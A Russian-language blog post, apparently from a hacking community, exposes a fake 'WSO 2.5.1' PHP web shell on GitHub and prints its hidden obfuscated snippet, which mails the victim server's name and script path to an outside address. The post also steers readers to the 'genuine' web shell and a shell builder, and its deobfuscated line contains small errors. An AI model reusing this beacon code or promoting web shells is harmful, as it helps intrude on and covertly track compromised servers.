WSO Fake!

Сегодня появился чудный комментарий в блоге к записи о WSO 2.5:

WSO New update 2.5.1 ( Web Shell )
http://i48.tinypic.com/33wxkw8.jpg
Changelog (v2.5.1):
Remove comments from the first line .
Added option to dump certain columns of tables.
the size of large files are now well defined .
in the file properties field «Create time» changed to «Change time» (http://php.net/filectime).
Fixed a bug that caused not working mysql brute force if there was a port of the server .
Fixed a bug due to which one can not see the contents of a table called download in the database.
https://github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.zip
https://github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.php

Как-то подозрительно, что бы oRb спамил по поводу выхода «новой» (2.5.1 — не новая) версии своего шелла. Да еще его и на github выкладывал. Смотрим на учетку (логин — orbweb) и видим, что регистрация там совсем свежая. 100%, что фейк. Интересно, каким же образом у нас хотят увести наш добытые потом и кровью шеллы? Смотрим исходник и между функциями actionSelfRemove и actionBruteforce видим такой код:

$x10="\x6d\x61\151\154";$x0b = $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT\x5fN\101\x4d\105"];$x0c = "array " . $x0b;$x0d = array ("\x63\141","li","\x66\167\162\x69t\145","\100","ve\x2e");$x0e = $x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f = @$x10($x0e,$x0c,$x0b);

Немного преукрасим его и видим:

$x10="mail";$x0b = $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];$x0c = "array " . $x0b;$x0d = array ("ca","li","fwrite","@","ve.");$x0e = 'frite'.'@'.'li'.'vi.'.'ca';$x0f = @$x10($x0e,$x0c,$x0b);

В общем, получается просто отправка письма на fwrite@livi.ca (возможно я пропустил, но в письмо не аттачится пароль к шеллу). Просто и примитивно.

Еще раз для тех, кто читает только последний абзац: данный «шелл» — фейк! Пользуйтесь только шеллом из темы oRb’a на rdot — ссылка. Ну и нашим билдером тоже можно 🙂

, , , ,

Оставить комментарий

Top ↑ | Main page | Back